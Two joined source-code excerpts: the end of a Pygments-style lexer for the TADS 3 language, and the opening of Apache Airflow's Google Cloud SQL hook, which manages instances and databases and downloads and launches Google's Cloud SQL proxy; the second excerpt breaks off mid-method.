'block/basic': [
(r'[;:]+', Punctuation),
(r'\{', Punctuation, '#push'),
(r'\}', Punctuation, '#pop'),
(r'default\b', Keyword.Reserved),
(r'(%s)(%s*)(:)' % (_name, _ws),
bygroups(Name.Label, using(this, state='whitespace'),
Punctuation)),
include('whitespace')
],
'block': [
include('block/basic'),
(r'(?!\Z)', Text, ('more', 'main'))
],
'block/embed': [
(r'>>', String.Interpol, '#pop'),
include('block/basic'),
(r'(?!\Z)', Text, ('more/embed', 'main'))
],
'main/basic': [
include('whitespace'),
(r'\(', Punctuation, ('#pop', 'more', 'main')),
(r'\[', Punctuation, ('#pop', 'more/list', 'main')),
(r'\{', Punctuation, ('#pop', 'more/inner', 'main/inner',
'more/parameters', 'main/parameters')),
(r'\*|\.{3}', Punctuation, '#pop'),
(r'(?i)0x[\da-f]+', Number.Hex, '#pop'),
(r'(\d+\.(?!\.)\d*|\.\d+)([eE][-+]?\d+)?|\d+[eE][-+]?\d+',
Number.Float, '#pop'),
(r'0[0-7]+', Number.Oct, '#pop'),
(r'\d+', Number.Integer, '#pop'),
(r'"""', String.Double, ('#pop', 'tdqs')),
(r"'''", String.Single, ('#pop', 'tsqs')),
(r'"', String.Double, ('#pop', 'dqs')),
(r"'", String.Single, ('#pop', 'sqs')),
(r'R"""', String.Regex, ('#pop', 'tdqr')),
(r"R'''", String.Regex, ('#pop', 'tsqr')),
(r'R"', String.Regex, ('#pop', 'dqr')),
(r"R'", String.Regex, ('#pop', 'sqr')),
# Two-token keywords
(r'(extern)(%s+)(object\b)' % _ws,
bygroups(Keyword.Reserved, using(this, state='whitespace'),
Keyword.Reserved)),
(r'(function|method)(%s*)(\()' % _ws,
bygroups(Keyword.Reserved, using(this, state='whitespace'),
Punctuation),
('#pop', 'block?', 'more/parameters', 'main/parameters')),
(r'(modify)(%s+)(grammar\b)' % _ws,
bygroups(Keyword.Reserved, using(this, state='whitespace'),
Keyword.Reserved),
('#pop', 'object-body/no-braces', ':', 'grammar')),
(r'(new)(%s+(?=(?:function|method)\b))' % _ws,
bygroups(Keyword.Reserved, using(this, state='whitespace'))),
(r'(object)(%s+)(template\b)' % _ws,
bygroups(Keyword.Reserved, using(this, state='whitespace'),
Keyword.Reserved), ('#pop', 'template')),
(r'(string)(%s+)(template\b)' % _ws,
bygroups(Keyword, using(this, state='whitespace'),
Keyword.Reserved), ('#pop', 'function-name')),
# Keywords
(r'(argcount|definingobj|invokee|replaced|targetobj|targetprop)\b',
Name.Builtin, '#pop'),
(r'(break|continue|goto)\b', Keyword.Reserved, ('#pop', 'label')),
(r'(case|extern|if|intrinsic|return|static|while)\b',
Keyword.Reserved),
(r'catch\b', Keyword.Reserved, ('#pop', 'catch')),
(r'class\b', Keyword.Reserved,
('#pop', 'object-body/no-braces', 'class')),
(r'(default|do|else|finally|try)\b', Keyword.Reserved, '#pop'),
(r'(dictionary|property)\b', Keyword.Reserved,
('#pop', 'constants')),
(r'enum\b', Keyword.Reserved, ('#pop', 'enum')),
(r'export\b', Keyword.Reserved, ('#pop', 'main')),
(r'(for|foreach)\b', Keyword.Reserved,
('#pop', 'more/inner', 'main/inner')),
(r'(function|method)\b', Keyword.Reserved,
('#pop', 'block?', 'function-name')),
(r'grammar\b', Keyword.Reserved,
('#pop', 'object-body/no-braces', 'grammar')),
(r'inherited\b', Keyword.Reserved, ('#pop', 'inherited')),
(r'local\b', Keyword.Reserved,
('#pop', 'more/local', 'main/local')),
(r'(modify|replace|switch|throw|transient)\b', Keyword.Reserved,
'#pop'),
(r'new\b', Keyword.Reserved, ('#pop', 'class')),
(r'(nil|true)\b', Keyword.Constant, '#pop'),
(r'object\b', Keyword.Reserved, ('#pop', 'object-body/no-braces')),
(r'operator\b', Keyword.Reserved, ('#pop', 'operator')),
(r'propertyset\b', Keyword.Reserved,
('#pop', 'propertyset', 'main')),
(r'self\b', Name.Builtin.Pseudo, '#pop'),
(r'template\b', Keyword.Reserved, ('#pop', 'template')),
# Operators
(r'(__objref|defined)(%s*)(\()' % _ws,
bygroups(Operator.Word, using(this, state='whitespace'),
Operator), ('#pop', 'more/__objref', 'main')),
(r'delegated\b', Operator.Word),
# Compiler-defined macros and built-in properties
(r'(__DATE__|__DEBUG|__LINE__|__FILE__|'
r'__TADS_MACRO_FORMAT_VERSION|__TADS_SYS_\w*|__TADS_SYSTEM_NAME|'
r'__TADS_VERSION_MAJOR|__TADS_VERSION_MINOR|__TADS3|__TIME__|'
r'construct|finalize|grammarInfo|grammarTag|lexicalParent|'
r'miscVocab|sourceTextGroup|sourceTextGroupName|'
r'sourceTextGroupOrder|sourceTextOrder)\b', Name.Builtin, '#pop')
],
'main': [
include('main/basic'),
(_name, Name, '#pop'),
default('#pop')
],
'more/basic': [
(r'\(', Punctuation, ('more/list', 'main')),
(r'\[', Punctuation, ('more', 'main')),
(r'\.{3}', Punctuation),
(r'->|\.\.', Punctuation, 'main'),
(r'(?=;)|[:)\]]', Punctuation, '#pop'),
include('whitespace'),
(_operator, Operator, 'main'),
(r'\?', Operator, ('main', 'more/conditional', 'main')),
(r'(is|not)(%s+)(in\b)' % _ws,
bygroups(Operator.Word, using(this, state='whitespace'),
Operator.Word)),
(r'[^\s!"%-_a-z{-~]+', Error) # Averts an infinite loop
],
'more': [
include('more/basic'),
default('#pop')
],
# Then expression (conditional operator)
'more/conditional': [
(r':(?!:)', Operator, '#pop'),
include('more')
],
# Embedded expressions
'more/embed': [
(r'>>', String.Interpol, '#pop:2'),
include('more')
],
# For/foreach loop initializer or short-form anonymous function
'main/inner': [
(r'\(', Punctuation, ('#pop', 'more/inner', 'main/inner')),
(r'local\b', Keyword.Reserved, ('#pop', 'main/local')),
include('main')
],
'more/inner': [
(r'\}', Punctuation, '#pop'),
(r',', Punctuation, 'main/inner'),
(r'(in|step)\b', Keyword, 'main/inner'),
include('more')
],
# Local
'main/local': [
(_name, Name.Variable, '#pop'),
include('whitespace')
],
'more/local': [
(r',', Punctuation, 'main/local'),
include('more')
],
# List
'more/list': [
(r'[,:]', Punctuation, 'main'),
include('more')
],
# Parameter list
'main/parameters': [
(r'(%s)(%s*)(?=:)' % (_name, _ws),
bygroups(Name.Variable, using(this, state='whitespace')), '#pop'),
(r'(%s)(%s+)(%s)' % (_name, _ws, _name),
bygroups(Name.Class, using(this, state='whitespace'),
Name.Variable), '#pop'),
(r'\[+', Punctuation),
include('main/basic'),
(_name, Name.Variable, '#pop'),
default('#pop')
],
'more/parameters': [
(r'(:)(%s*(?=[?=,:)]))' % _ws,
bygroups(Punctuation, using(this, state='whitespace'))),
(r'[?\]]+', Punctuation),
(r'[:)]', Punctuation, ('#pop', 'multimethod?')),
(r',', Punctuation, 'main/parameters'),
(r'=', Punctuation, ('more/parameter', 'main')),
include('more')
],
'more/parameter': [
(r'(?=[,)])', Text, '#pop'),
include('more')
],
'multimethod?': [
(r'multimethod\b', Keyword, '#pop'),
include('whitespace'),
default('#pop')
],
# Statements and expressions
'more/__objref': [
(r',', Punctuation, 'mode'),
(r'\)', Operator, '#pop'),
include('more')
],
'mode': [
(r'(error|warn)\b', Keyword, '#pop'),
include('whitespace')
],
'catch': [
(r'\(+', Punctuation),
(_name, Name.Exception, ('#pop', 'variables')),
include('whitespace')
],
'enum': [
include('whitespace'),
(r'token\b', Keyword, ('#pop', 'constants')),
default(('#pop', 'constants'))
],
'grammar': [
(r'\)+', Punctuation),
(r'\(', Punctuation, 'grammar-tag'),
(r':', Punctuation, 'grammar-rules'),
(_name, Name.Class),
include('whitespace')
],
'grammar-tag': [
include('whitespace'),
(r'"""([^\\"<]|""?(?!")|\\"+|\\.|<(?!<))+("{3,}|<<)|'
r'R"""([^\\"]|""?(?!")|\\"+|\\.)+"{3,}|'
r"'''([^\\'<]|''?(?!')|\\'+|\\.|<(?!<))+('{3,}|<<)|"
r"R'''([^\\']|''?(?!')|\\'+|\\.)+'{3,}|"
r'"([^\\"<]|\\.|<(?!<))+("|<<)|R"([^\\"]|\\.)+"|'
r"'([^\\'<]|\\.|<(?!<))+('|<<)|R'([^\\']|\\.)+'|"
r"([^)\s\\/]|/(?![/*]))+|\)", String.Other, '#pop')
],
'grammar-rules': [
include('string'),
include('whitespace'),
(r'(\[)(%s*)(badness)' % _ws,
bygroups(Punctuation, using(this, state='whitespace'), Keyword),
'main'),
(r'->|%s|[()]' % _operator, Punctuation),
(_name, Name.Constant),
default('#pop:2')
],
':': [
(r':', Punctuation, '#pop')
],
'function-name': [
(r'(<<([^>]|>>>|>(?!>))*>>)+', String.Interpol),
(r'(?=%s?%s*[({])' % (_name, _ws), Text, '#pop'),
(_name, Name.Function, '#pop'),
include('whitespace')
],
'inherited': [
(r'<', Punctuation, ('#pop', 'classes', 'class')),
include('whitespace'),
(_name, Name.Class, '#pop'),
default('#pop')
],
'operator': [
(r'negate\b', Operator.Word, '#pop'),
include('whitespace'),
(_operator, Operator),
default('#pop')
],
'propertyset': [
(r'\(', Punctuation, ('more/parameters', 'main/parameters')),
(r'\{', Punctuation, ('#pop', 'object-body')),
include('whitespace')
],
'template': [
(r'(?=;)', Text, '#pop'),
include('string'),
(r'inherited\b', Keyword.Reserved),
include('whitespace'),
(r'->|\?|%s' % _operator, Punctuation),
(_name, Name.Variable)
],
# Identifiers
'class': [
(r'\*|\.{3}', Punctuation, '#pop'),
(r'object\b', Keyword.Reserved, '#pop'),
(r'transient\b', Keyword.Reserved),
(_name, Name.Class, '#pop'),
include('whitespace'),
default('#pop')
],
'classes': [
(r'[:,]', Punctuation, 'class'),
include('whitespace'),
(r'>', Punctuation, '#pop'),
default('#pop')
],
'constants': [
(r',+', Punctuation),
(r';', Punctuation, '#pop'),
(r'property\b', Keyword.Reserved),
(_name, Name.Constant),
include('whitespace')
],
'label': [
(_name, Name.Label, '#pop'),
include('whitespace'),
default('#pop')
],
'variables': [
(r',+', Punctuation),
(r'\)', Punctuation, '#pop'),
include('whitespace'),
(_name, Name.Variable)
],
# Whitespace and comments
'whitespace': [
(r'^%s*#(%s|[^\n]|(?<=\\)\n)*\n?' % (_ws_pp, _comment_multiline),
Comment.Preproc),
(_comment_single, Comment.Single),
(_comment_multiline, Comment.Multiline),
(r'\\+\n+%s*#?|\n+|([^\S\n]|\\)+' % _ws_pp, Text)
],
# Strings
'string': [
(r'"""', String.Double, 'tdqs'),
(r"'''", String.Single, 'tsqs'),
(r'"', String.Double, 'dqs'),
(r"'", String.Single, 'sqs')
],
's/escape': [
(r'\{\{|\}\}|%s' % _escape, String.Escape)
],
's/verbatim': [
(r'<<\s*(as\s+decreasingly\s+likely\s+outcomes|cycling|else|end|'
r'first\s+time|one\s+of|only|or|otherwise|'
r'(sticky|(then\s+)?(purely\s+)?at)\s+random|stopping|'
r'(then\s+)?(half\s+)?shuffled|\|\|)\s*>>', String.Interpol),
(r'<<(%%(_(%s|\\?.)|[\-+ ,#]|\[\d*\]?)*\d*\.?\d*(%s|\\?.)|'
r'\s*((else|otherwise)\s+)?(if|unless)\b)?' % (_escape, _escape),
String.Interpol, ('block/embed', 'more/embed', 'main'))
],
's/entity': [
(r'(?i)&(#(x[\da-f]+|\d+)|[a-z][\da-z]*);?', Name.Entity)
],
'tdqs': _make_string_state(True, True),
'tsqs': _make_string_state(True, False),
'dqs': _make_string_state(False, True),
'sqs': _make_string_state(False, False),
'tdqs/listing': _make_string_state(True, True, 'listing'),
'tsqs/listing': _make_string_state(True, False, 'listing'),
'dqs/listing': _make_string_state(False, True, 'listing'),
'sqs/listing': _make_string_state(False, False, 'listing'),
'tdqs/xmp': _make_string_state(True, True, 'xmp'),
'tsqs/xmp': _make_string_state(True, False, 'xmp'),
'dqs/xmp': _make_string_state(False, True, 'xmp'),
'sqs/xmp': _make_string_state(False, False, 'xmp'),
# Tags
'tdqt': _make_tag_state(True, True),
'tsqt': _make_tag_state(True, False),
'dqt': _make_tag_state(False, True),
'sqt': _make_tag_state(False, False),
'dqs/tdqt': _make_attribute_value_state(r'"', True, True),
'dqs/tsqt': _make_attribute_value_state(r'"', True, False),
'dqs/dqt': _make_attribute_value_state(r'"', False, True),
'dqs/sqt': _make_attribute_value_state(r'"', False, False),
'sqs/tdqt': _make_attribute_value_state(r"'", True, True),
'sqs/tsqt': _make_attribute_value_state(r"'", True, False),
'sqs/dqt': _make_attribute_value_state(r"'", False, True),
'sqs/sqt': _make_attribute_value_state(r"'", False, False),
'uqs/tdqt': _make_attribute_value_state(_no_quote, True, True),
'uqs/tsqt': _make_attribute_value_state(_no_quote, True, False),
'uqs/dqt': _make_attribute_value_state(_no_quote, False, True),
'uqs/sqt': _make_attribute_value_state(_no_quote, False, False),
# Regular expressions
'tdqr': [
(r'[^\\"]+', String.Regex),
(r'\\"*', String.Regex),
(r'"{3,}', String.Regex, '#pop'),
(r'"', String.Regex)
],
'tsqr': [
(r"[^\\']+", String.Regex),
(r"\\'*", String.Regex),
(r"'{3,}", String.Regex, '#pop'),
(r"'", String.Regex)
],
'dqr': [
(r'[^\\"]+', String.Regex),
(r'\\"?', String.Regex),
(r'"', String.Regex, '#pop')
],
'sqr': [
(r"[^\\']+", String.Regex),
(r"\\'?", String.Regex),
(r"'", String.Regex, '#pop')
]
}
def get_tokens_unprocessed(self, text, **kwargs):
pp = r'^%s*#%s*' % (self._ws_pp, self._ws_pp)
if_false_level = 0
for index, token, value in (
RegexLexer.get_tokens_unprocessed(self, text, **kwargs)):
if if_false_level == 0: # Not in a false #if
if (token is Comment.Preproc and
re.match(r'%sif%s+(0|nil)%s*$\n?' %
(pp, self._ws_pp, self._ws_pp), value)):
if_false_level = 1
else: # In a false #if
if token is Comment.Preproc:
if (if_false_level == 1 and
re.match(r'%sel(if|se)\b' % pp, value)):
if_false_level = 0
elif re.match(r'%sif' % pp, value):
if_false_level += 1
elif re.match(r'%sendif\b' % pp, value):
if_false_level -= 1
else:
token = Comment
yield index, token, value
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains a Google Cloud SQL Hook."""
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import socket
import string
import subprocess
import time
import uuid
from pathlib import Path
from subprocess import PIPE, Popen
from typing import Any, Dict, List, Optional, Sequence, Union
from urllib.parse import quote_plus
import httpx
from googleapiclient.discovery import Resource, build
from googleapiclient.errors import HttpError
from sqlalchemy.orm import Session
from airflow.exceptions import AirflowException
# Number of retries - used by googleapiclient method calls to perform retries
# For requests that are "retriable"
from airflow.hooks.base import BaseHook
from airflow.models import Connection
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
from airflow.providers.mysql.hooks.mysql import MySqlHook
from airflow.providers.postgres.hooks.postgres import PostgresHook
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import provide_session
UNIX_PATH_MAX = 108
# Time to sleep between active checks of the operation results
TIME_TO_SLEEP_IN_SECONDS = 20
class CloudSqlOperationStatus:
"""Helper class with operation statuses."""
PENDING = "PENDING"
RUNNING = "RUNNING"
DONE = "DONE"
UNKNOWN = "UNKNOWN"
class CloudSQLHook(GoogleBaseHook):
"""
Hook for Google Cloud SQL APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
:param api_version: This is the version of the api.
:type api_version: str
:param gcp_conn_id: The Airflow connection used for GCP credentials.
:type gcp_conn_id: str
:param delegate_to: This performs a task on one host with reference to other hosts.
:type delegate_to: Optional[str]
:param impersonation_chain: This is the optional service account to impersonate using short term
credentials.
:type impersonation_chain: Optional[str]
"""
conn_name_attr = 'gcp_conn_id'
default_conn_name = 'google_cloud_default'
conn_type = 'gcpcloudsql'
hook_name = 'Google Cloud SQL'
def __init__(
self,
api_version: str,
gcp_conn_id: str = default_conn_name,
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self.api_version = api_version
self._conn = None
def get_conn(self) -> Resource:
"""
Retrieves connection to Cloud SQL.
:return: Google Cloud SQL services object.
:rtype: dict
"""
if not self._conn:
http_authorized = self._authorize()
self._conn = build('sqladmin', self.api_version, http=http_authorized, cache_discovery=False)
return self._conn
@GoogleBaseHook.fallback_to_default_project_id
def get_instance(self, instance: str, project_id: str) -> dict:
"""
Retrieves a resource containing information about a Cloud SQL instance.
:param instance: Database instance ID. This does not include the project ID.
:type instance: str
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: A Cloud SQL instance resource.
:rtype: dict
"""
return (
self.get_conn()
.instances()
.get(project=project_id, instance=instance)
.execute(num_retries=self.num_retries)
)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def create_instance(self, body: Dict, project_id: str) -> None:
"""
Creates a new Cloud SQL instance.
:param body: Body required by the Cloud SQL insert API, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/insert#request-body.
:type body: dict
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
response = (
self.get_conn()
.instances()
.insert(project=project_id, body=body)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def patch_instance(self, body: dict, instance: str, project_id: str) -> None:
"""
Updates settings of a Cloud SQL instance.
Caution: This is not a partial update, so you must include values for
all the settings that you want to retain.
:param body: Body required by the Cloud SQL patch API, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/patch#request-body.
:type body: dict
:param instance: Cloud SQL instance ID. This does not include the project ID.
:type instance: str
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
response = (
self.get_conn()
.instances()
.patch(project=project_id, instance=instance, body=body)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def delete_instance(self, instance: str, project_id: str) -> None:
"""
Deletes a Cloud SQL instance.
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param instance: Cloud SQL instance ID. This does not include the project ID.
:type instance: str
:return: None
"""
response = (
self.get_conn()
.instances()
.delete(project=project_id, instance=instance)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
def get_database(self, instance: str, database: str, project_id: str) -> dict:
"""
Retrieves a database resource from a Cloud SQL instance.
:param instance: Database instance ID. This does not include the project ID.
:type instance: str
:param database: Name of the database in the instance.
:type database: str
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: A Cloud SQL database resource, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/databases#resource.
:rtype: dict
"""
return (
self.get_conn()
.databases()
.get(project=project_id, instance=instance, database=database)
.execute(num_retries=self.num_retries)
)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def create_database(self, instance: str, body: Dict, project_id: str) -> None:
"""
Creates a new database inside a Cloud SQL instance.
:param instance: Database instance ID. This does not include the project ID.
:type instance: str
:param body: The request body, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/databases/insert#request-body.
:type body: dict
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
response = (
self.get_conn()
.databases()
.insert(project=project_id, instance=instance, body=body)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def patch_database(
self,
instance: str,
database: str,
body: Dict,
project_id: str,
) -> None:
"""
Updates a database resource inside a Cloud SQL instance.
This method supports patch semantics.
See https://cloud.google.com/sql/docs/mysql/admin-api/how-tos/performance#patch.
:param instance: Database instance ID. This does not include the project ID.
:type instance: str
:param database: Name of the database to be updated in the instance.
:type database: str
:param body: The request body, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/databases/insert#request-body.
:type body: dict
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
response = (
self.get_conn()
.databases()
.patch(project=project_id, instance=instance, database=database, body=body)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def delete_database(self, instance: str, database: str, project_id: str) -> None:
"""
Deletes a database from a Cloud SQL instance.
:param instance: Database instance ID. This does not include the project ID.
:type instance: str
:param database: Name of the database to be deleted in the instance.
:type database: str
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
response = (
self.get_conn()
.databases()
.delete(project=project_id, instance=instance, database=database)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
@GoogleBaseHook.operation_in_progress_retry()
def export_instance(self, instance: str, body: Dict, project_id: str) -> None:
"""
Exports data from a Cloud SQL instance to a Cloud Storage bucket as a SQL dump
or CSV file.
:param instance: Database instance ID of the Cloud SQL instance. This does not include the
project ID.
:type instance: str
:param body: The request body, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/export#request-body
:type body: dict
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
response = (
self.get_conn()
.instances()
.export(project=project_id, instance=instance, body=body)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
def import_instance(self, instance: str, body: Dict, project_id: str) -> None:
"""
Imports data into a Cloud SQL instance from a SQL dump or CSV file in
Cloud Storage.
:param instance: Database instance ID. This does not include the
project ID.
:type instance: str
:param body: The request body, as described in
https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/export#request-body
:type body: dict
:param project_id: Project ID of the project that contains the instance. If set
to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
try:
response = (
self.get_conn()
.instances()
.import_(project=project_id, instance=instance, body=body)
.execute(num_retries=self.num_retries)
)
operation_name = response["name"]
self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
except HttpError as ex:
raise AirflowException(f'Importing instance {instance} failed: {ex.content}')
def _wait_for_operation_to_complete(self, project_id: str, operation_name: str) -> None:
"""
Waits for the named operation to complete - checks status of the
asynchronous call.
:param project_id: Project ID of the project that contains the instance.
:type project_id: str
:param operation_name: Name of the operation.
:type operation_name: str
:return: None
"""
service = self.get_conn()
while True:
operation_response = (
service.operations()
.get(project=project_id, operation=operation_name)
.execute(num_retries=self.num_retries)
)
if operation_response.get("status") == CloudSqlOperationStatus.DONE:
error = operation_response.get("error")
if error:
# Extracting the errors list as string and trimming square braces
error_msg = str(error.get("errors"))[1:-1]
raise AirflowException(error_msg)
# No meaningful info to return from the response in case of success
return
time.sleep(TIME_TO_SLEEP_IN_SECONDS)
CLOUD_SQL_PROXY_DOWNLOAD_URL = "https://dl.google.com/cloudsql/cloud_sql_proxy.{}.{}"
CLOUD_SQL_PROXY_VERSION_DOWNLOAD_URL = (
"https://storage.googleapis.com/cloudsql-proxy/{}/cloud_sql_proxy.{}.{}"
)
GCP_CREDENTIALS_KEY_PATH = "extra__google_cloud_platform__key_path"
GCP_CREDENTIALS_KEYFILE_DICT = "extra__google_cloud_platform__keyfile_dict"
class CloudSqlProxyRunner(LoggingMixin):
"""
Downloads and runs cloud-sql-proxy as subprocess of the Python process.
The cloud-sql-proxy needs to be downloaded and started before we can connect
to the Google Cloud SQL instance via database connection. It establishes
secure tunnel connection to the database. It authorizes using the
Google Cloud credentials that are passed by the configuration.
More details about the proxy can be found here:
https://cloud.google.com/sql/docs/mysql/sql-proxy
:param path_prefix: Unique path prefix where proxy will be downloaded and
directories created for unix sockets.
:type path_prefix: str
:param instance_specification: Specification of the instance to connect the
proxy to. It should be specified in the form that is described in
https://cloud.google.com/sql/docs/mysql/sql-proxy#multiple-instances in
-instances parameter (typically in the form of ``<project>:<region>:<instance>``
for UNIX socket connections and in the form of
``<project>:<region>:<instance>=tcp:<port>`` for TCP connections.
:type instance_specification: str
:param gcp_conn_id: Id of Google Cloud connection to use for
authentication
:type gcp_conn_id: str
:param project_id: Optional id of the Google Cloud project to connect to - it overwrites
default project id taken from the Google Cloud connection.
:type project_id: str
:param sql_proxy_version: Specific version of SQL proxy to download
(for example 'v1.13'). By default latest version is downloaded.
:type sql_proxy_version: str
:param sql_proxy_binary_path: If specified, then proxy will be
used from the path specified rather than dynamically generated. This means
that if the binary is not present in that path it will also be downloaded.
:type sql_proxy_binary_path: str
"""
def __init__(
self,
path_prefix: str,
instance_specification: str,
gcp_conn_id: str = 'google_cloud_default',
project_id: Optional[str] = None,
sql_proxy_version: Optional[str] = None,
sql_proxy_binary_path: Optional[str] = None,
) -> None:
super().__init__()
self.path_prefix = path_prefix
if not self.path_prefix:
raise AirflowException("The path_prefix must not be empty!")
self.sql_proxy_was_downloaded = False
self.sql_proxy_version = sql_proxy_version
self.download_sql_proxy_dir = None
self.sql_proxy_process = None # type: Optional[Popen]
self.instance_specification = instance_specification
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.command_line_parameters = [] # type: List[str]
self.cloud_sql_proxy_socket_directory = self.path_prefix
self.sql_proxy_path = (
sql_proxy_binary_path if sql_proxy_binary_path else self.path_prefix + "_cloud_sql_proxy"
)
self.credentials_path = self.path_prefix + "_credentials.json"
self._build_command_line_parameters()
def _build_command_line_parameters(self) -> None:
self.command_line_parameters.extend(['-dir', self.cloud_sql_proxy_socket_directory])
self.command_line_parameters.extend(['-instances', self.instance_specification])
@staticmethod
def _is_os_64bit() -> bool:
return platform.machine().endswith('64')
def _download_sql_proxy_if_needed(self) -> None:
if os.path.isfile(self.sql_proxy_path):
self.log.info("cloud-sql-proxy is already present")
return
system = platform.system().lower()
processor = "amd64" if CloudSqlProxyRunner._is_os_64bit() else "386"
if not self.sql_proxy_version:
download_url = CLOUD_SQL_PROXY_DOWNLOAD_URL.format(system, processor)
else:
download_url = CLOUD_SQL_PROXY_VERSION_DOWNLOAD_URL.format(
self.sql_proxy_version, system, processor
)
proxy_path_tmp = self.sql_proxy_path + ".tmp"
self.log.info("Downloading cloud_sql_proxy from %s to %s", download_url, proxy_path_tmp)
response = httpx.get(download_url, allow_redirects=True)
# Downloading to .tmp file first to avoid case where partially downloaded
# binary is used by parallel operator which uses the same fixed binary path
with open(proxy_path_tmp, 'wb') as file:
file.write(response.content)
if response.status_code != 200:
raise AirflowException(
"The cloud-sql-proxy could not be downloaded. Status code = {}. "
"Reason = {}".format(response.status_code, response.reason)
)
self.log.info("Moving sql_proxy binary from %s to %s", proxy_path_tmp, self.sql_proxy_path)
shutil.move(proxy_path_tmp, self.sql_proxy_path)
os.chmod(self.sql_proxy_path, 0o744) # Set executable bit
self.sql_proxy_was_downloaded = True
@provide_session
def _get_credential_parameters(self, session: Session) -> List[str]:
connection = session.query(Connection).filter(Connection.conn_id == self.gcp_conn_id).first()
session.expunge_all()
if connection.extra_dejson.get(GCP_CREDENTIALS_KEY_PATH):
credential_params = ['-credential_file', connection.extra_dejson[GCP_CREDENTIALS_KEY_PATH]]
elif connection.extra_dejson.get(GCP_CREDENTIALS_KEYFILE_DICT):
credential_file_content = json.loads(connection.extra_dejson[GCP_CREDENTIALS_KEYFILE_DICT])
self.log.info("Saving credentials to %s", self.credentials_path)
with open(self.credentials_path, "w") as file:
json.dump(credential_file_content, file)
credential_params = ['-credential_file', self.credentials_path]
else:
self.log.info(
"The credentials are not supplied by neither key_path nor "
"keyfile_dict of the gcp connection %s. Falling back to "
"default activated account",
self.gcp_conn_id,
)
credential_params = []
if not self.instance_specification:
project_id = connection.extra_dejson.get('extra__google_cloud_platform__project')
if self.project_id:
project_id = self.project_id
if not project_id:
raise AirflowException(
"For forwarding all instances, the project id "
"for Google Cloud should be provided either "
"by project_id extra in the Google Cloud connection or by "
"project_id provided in the operator."
)
credential_params.extend(['-projects', project_id])
return credential_params
def start_proxy(self) -> None:
"""
Starts Cloud SQL Proxy.
You have to remember to stop the proxy if you started it!
"""
self._download_sql_proxy_if_needed()
if self.sql_proxy_process:
raise AirflowException(f"The sql proxy is already running: {self.sql_proxy_process}")
else:
command_to_run = [self.sql_proxy_path]
command_to_run.extend(self.command_line_parameters)
self.log.info("Creating directory %s", self.cloud_sql_proxy_socket_directory)
Path(self.cloud_sql_proxy_socket_directory).mkdir(parents=True, exist_ok=True)
